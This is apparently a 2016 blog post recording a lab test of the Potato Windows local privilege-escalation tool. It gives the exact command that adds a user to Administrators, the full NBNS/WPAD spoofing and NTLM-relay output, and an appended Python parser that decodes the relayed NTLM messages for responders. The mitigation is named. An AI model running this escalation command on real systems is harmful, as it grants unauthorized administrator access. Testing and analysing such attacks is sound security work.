Monday, February 8, 2016

Potato

Discovered this little trick that will escalate a local user on a Windows box and give them local admin rights.  The app is called Potato and it's available at https://github.com/foxglovesec/Potato.

Just to see if this would really work, I set up a Windows 7 Enterprise VM: the first instance running a virus scanner (ESET) and the other running Symantec Endpoint Protection.  Then I downloaded and decompressed the zip file.  Neither scanner cared.  Not necessarily exhaustive research, but as a form of stratified sampling, it will do.

So, the next logical step was to execute it.  The GitHub page does a great job of describing how it works and how to execute it.


From a terminal:

net localgroup administrators - to list the group's members and confirm that the test user, in this case "hacker", was not yet one of them; then

ipconfig - to get the local IP address of the box; then I executed the following:

Potato.exe -ip 10.211.55.7 -disable_exhaust true -cmd "C:\\Windows\\System32\\cmd.exe /k net localgroup administrators hacker /add"


That resulted in the following output:


Starting NBNS spoofer...

Clearing dns and nbns cache...
Listening...
Got 127.0.0.1
Spoofed target WPAD succesfully...
Checking for windows defender updates...
Got Request: GET http://127.0.0.1/wpad.dat!
Spoofing wpad...
Got Request: GET http://127.0.0.1/wpad.dat!
Spoofing wpad...
Got Request: HEAD http://download.windowsupdate.comhttp//download.windowsupdate.
com/v9/windowsupdate/redir/muv4wuredir.cab?1602082135!
Redirecting to target..http://localhost/GETHASHES949255
Got Request: GET http://127.0.0.1/wpad.dat!
Spoofing wpad...
Got Request: HEAD http://localhost/GETHASHES949255!
Sending 401...
Got request for hashes...
Got Request: HEAD http://localhost/GETHASHES949255!
Sending 401...
Parsing initial NTLM auth...
NTLM TlRMTVNTUAABAAAAB7IIogkACQA3AAAADwAPACgAAAAGAbAdAAAAD1NFQUxNSU5EU0VUQzI3Q1d
PUktHUk9VUA==
Got Request: GET http://127.0.0.1/wpad.dat!
Spoofing wpad...
Setting up SMB relay...
initSecContext - State 0
initSecContext - State 1
Adding TlRMTVNTUAACAAAAHgAeADgAAAAFwoqiISJWymDPCzaAyKUBAAAAAJgAmABWAAAABgGwHQAAA
A9TAEUAQQBMAE0ASQBOAEQAUwBFAFQAQwAyADcAQwACAB4AUwBFAEEATABNAEkATgBEAFMARQBUAEMAM
gA3AEMAAQAeAFMARQBBAEwATQBJAE4ARABTAEUAVABDADIANwBDAAQAHgBTAEUAQQBMAE0ASQBOAEQAU
wBFAFQAQwAyADcAQwADAB4AUwBFAEEATABNAEkATgBEAFMARQBUAEMAMgA3AEMABwAIAMCeF5u4YtEBA
AAAAA== to queue
Got SMB challenge TlRMTVNTUAACAAAAHgAeADgAAAAFwoqiISJWymDPCzaAyKUBAAAAAJgAmABWAA
AABgGwHQAAAA9TAEUAQQBMAE0ASQBOAEQAUwBFAFQAQwAyADcAQwACAB4AUwBFAEEATABNAEkATgBEAF
MARQBUAEMAMgA3AEMAAQAeAFMARQBBAEwATQBJAE4ARABTAEUAVABDADIANwBDAAQAHgBTAEUAQQBMAE
0ASQBOAEQAUwBFAFQAQwAyADcAQwADAB4AUwBFAEEATABNAEkATgBEAFMARQBUAEMAMgA3AEMABwAIAM
CeF5u4YtEBAAAAAA==
Got Request: HEAD http://localhost/GETHASHES949255!
Sending 401...
Parsing final auth...
TlRMTVNTUAADAAAAAAAAAFgAAAAAAAAAWAAAAAAAAABYAAAAAAAAAFgAAAAAAAAAWAAAAAAAAABYAAAA
BcKIogYBsB0AAAAPQsdH2fWtywYPgDCuRqyEqA==
Got TlRMTVNTUAADAAAAAAAAAFgAAAAAAAAAWAAAAAAAAABYAAAAAAAAAFgAAAAAAAAAWAAAAAAAAABY
AAAABcKIogYBsB0AAAAPQsdH2fWtywYPgDCuRqyEqA==
Successfully started service
Got Request: HEAD http://download.windowsupdate.comhttp//download.windowsupdate.
com/v9/windowsupdate/redir/muv4wuredir.cab?1602082135!
Got Request: HEAD http://download.windowsupdate.comhttp//download.windowsupdate.
com/v9/windowsupdate/redir/muv4wuredir.cab?1602082135!
Got Request: HEAD http://download.windowsupdate.comhttp//download.windowsupdate.
com/v9/windowsupdate/redir/muv4wuredir.cab?1602082135!

Back at the prompt, I ran net localgroup administrators again to check whether the hacker user's privileges had indeed been escalated:


Alias name     administrators

Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
hacker
sealmindset
The command completed successfully.

It worked. 


But as the author states on the site, you can prevent this by enabling Extended Protection for Authentication.
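The three base64 blobs in the output above are the NTLM NEGOTIATE, CHALLENGE and AUTHENTICATE messages that passed through Potato's HTTP listener and SMB relay, and decoding them is the first thing a responder would do with a log like this: it shows which host the client was, which host answered the SMB challenge, when it happened, and which signing flags were negotiated. The parser below is an added example written for this post, not code from the Potato project. It follows the MS-NLMP message layout and takes the blobs exactly as printed above (the line-wrapped output joined back together, using the "Got SMB challenge" copy of the CHALLENGE message); the flag and AV-pair name tables are the subset of MS-NLMP constants needed here.

```python
"""Decode the NTLMSSP messages that Potato printed so a responder can see what
the relayed exchange actually contained.  Added example (not Potato project code);
field offsets follow MS-NLMP 2.2.1."""
import base64
import struct
from datetime import datetime, timedelta, timezone

# Messages exactly as printed in the post, with the 80-column wrapping undone.
NEGOTIATE_B64 = ("TlRMTVNTUAABAAAAB7IIogkACQA3AAAADwAPACgAAAAGAbAdAAAAD1NFQUxNSU5EU0VUQzI3Q1d"
                 "PUktHUk9VUA==")
CHALLENGE_B64 = ("TlRMTVNTUAACAAAAHgAeADgAAAAFwoqiISJWymDPCzaAyKUBAAAAAJgAmABWAA"
                 "AABgGwHQAAAA9TAEUAQQBMAE0ASQBOAEQAUwBFAFQAQwAyADcAQwACAB4AUwBFAEEATABNAEkATgBEAF"
                 "MARQBUAEMAMgA3AEMAAQAeAFMARQBBAEwATQBJAE4ARABTAEUAVABDADIANwBDAAQAHgBTAEUAQQBMAE"
                 "0ASQBOAEQAUwBFAFQAQwAyADcAQwADAB4AUwBFAEEATABNAEkATgBEAFMARQBUAEMAMgA3AEMABwAIAM"
                 "CeF5u4YtEBAAAAAA==")
AUTHENTICATE_B64 = ("TlRMTVNTUAADAAAAAAAAAFgAAAAAAAAAWAAAAAAAAABYAAAAAAAAAFgAAAAAAAAAWAAAAAAAAABYAAAA"
                    "BcKIogYBsB0AAAAPQsdH2fWtywYPgDCuRqyEqA==")

# Subset of NegotiateFlags (MS-NLMP 2.2.2.5) that matters when judging a relay.
FLAGS = {
    0x00000001: "UNICODE", 0x00000002: "OEM", 0x00000004: "REQUEST_TARGET",
    0x00000010: "SIGN", 0x00000020: "SEAL", 0x00000200: "NTLM",
    0x00000800: "ANONYMOUS", 0x00008000: "ALWAYS_SIGN",
    0x00080000: "EXTENDED_SESSIONSECURITY", 0x00800000: "TARGET_INFO",
    0x02000000: "VERSION", 0x20000000: "128", 0x40000000: "KEY_EXCH", 0x80000000: "56",
}
AV_NAMES = {1: "NbComputerName", 2: "NbDomainName", 3: "DnsComputerName",
            4: "DnsDomainName", 5: "DnsTreeName", 7: "Timestamp"}


def _field(buf, off):
    """(Len, MaxLen, BufferOffset) descriptor at buf[off:off+8] -> bytes it points at."""
    length, _maxlen, start = struct.unpack_from("<HHI", buf, off)
    return buf[start:start + length]


def _filetime(raw):
    """Windows FILETIME (100 ns ticks since 1601-01-01 UTC) -> aware datetime."""
    ticks = struct.unpack("<Q", raw)[0]
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=ticks // 10)


def parse_ntlm(b64):
    """Decode one base64 NTLMSSP message into a dict of its security-relevant fields."""
    buf = base64.b64decode(b64)
    if buf[:8] != b"NTLMSSP\x00":
        raise ValueError("not an NTLMSSP message")
    msg_type = struct.unpack_from("<I", buf, 8)[0]
    out = {"type": msg_type}
    if msg_type == 1:    # NEGOTIATE: flags at 12, then OEM domain/workstation fields
        out["flags"] = struct.unpack_from("<I", buf, 12)[0]
        out["domain"] = _field(buf, 16).decode("ascii")
        out["workstation"] = _field(buf, 24).decode("ascii")
    elif msg_type == 2:  # CHALLENGE: target name, flags, 8-byte server challenge, AV pairs
        out["flags"] = struct.unpack_from("<I", buf, 20)[0]
        out["target_name"] = _field(buf, 12).decode("utf-16-le")
        out["server_challenge"] = buf[24:32].hex()
        av, pos, info = _field(buf, 40), 0, {}
        while True:      # AV_PAIR list: (AvId, AvLen, value) until MsvAvEOL (id 0)
            av_id, av_len = struct.unpack_from("<HH", av, pos)
            pos += 4
            if av_id == 0:
                break
            val = av[pos:pos + av_len]
            pos += av_len
            name = AV_NAMES.get(av_id, f"AvId{av_id}")
            info[name] = _filetime(val) if av_id == 7 else val.decode("utf-16-le")
        out["target_info"] = info
    elif msg_type == 3:  # AUTHENTICATE: responses and identity fields, flags at 60
        out["lm_response"] = _field(buf, 12)
        out["nt_response"] = _field(buf, 20)
        out["domain"] = _field(buf, 28).decode("utf-16-le")
        out["user"] = _field(buf, 36).decode("utf-16-le")
        out["workstation"] = _field(buf, 44).decode("utf-16-le")
        out["flags"] = struct.unpack_from("<I", buf, 60)[0]
    else:
        raise ValueError(f"unknown NTLM message type {msg_type}")
    out["flag_names"] = [n for bit, n in FLAGS.items() if out["flags"] & bit]
    return out


if __name__ == "__main__":
    for label, blob in (("NEGOTIATE", NEGOTIATE_B64), ("CHALLENGE", CHALLENGE_B64),
                        ("AUTHENTICATE", AUTHENTICATE_B64)):
        print(label, parse_ntlm(blob))
```

Running it shows the NEGOTIATE message came from workstation SEALMINDSETC27C in WORKGROUP, the CHALLENGE was issued under that same computer name (the relay went back to the box itself), the server's target-info timestamp decodes to 2016-02-08 21:35:18 UTC, which matches the 1602082135 query string on the Windows Update request in the log, and the AUTHENTICATE message that was relayed carries empty user, domain and LM/NT response fields. In all three messages ALWAYS_SIGN is set but SIGN itself is never negotiated; an SMB server that requires signing, or the Extended Protection for Authentication the author points to, is what makes a relayed session of this kind fail.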

